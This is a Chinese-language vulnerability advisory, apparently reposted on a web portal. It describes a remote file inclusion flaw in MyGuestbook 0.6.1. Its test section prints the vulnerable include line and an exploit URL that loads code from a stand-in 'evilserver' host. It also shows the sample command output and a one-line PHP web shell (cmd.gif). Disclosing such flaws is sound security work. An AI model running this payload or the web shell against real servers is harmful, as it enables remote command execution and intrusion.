MyGuestbook form.inc.php3远程文件包含漏洞

2008-04-09 04:16:54来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MyGuestbook form.inc.php3远程文件包含漏洞

发布日期:2005-07-06
更新日期:2005-07-06

受影响系统:
MyGuestBook MyGuestBook 0.6.1
描述:
BUGTRAQ ID: 14155

MyGuestbook是使用MySQL/PostgreSQL和PHP3的简单的留言簿。

MyGuestbook中存在远程文件包含漏洞,攻击者可能利用这个漏洞以Web server进程的权限执行任意服务器端脚本。

起因是没有正确的过滤用户输入。

<*来源:SoulBlack Security Research (group@soulblack.com.ar)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112059876828730&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?
include("$lang.lang.inc.php3");
?>

/*

http://server/gb/form.inc.php3?lang=http://evilserver/cmd.gif?&cmd=id;uname -a;uptime

uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux cyan-1.farm.de
2.4.18custom_ko_w_ipsec #10 Fre Apr 19 13:05:46 CEST 2002 i686 unknown 6:51pm
up 463 days, 15:43, 0 users, load average: 0.00, 0.01, 0.02

*/

/*
-------
cmd.gif
-------

<?
system($cmd);
?>

*/

建议:
厂商补丁:

MyGuestBook
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://html-design.com/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:phpPgAdmin登录表单目录遍历漏洞

下一篇:Sun Solaris非特权网络端口劫持漏洞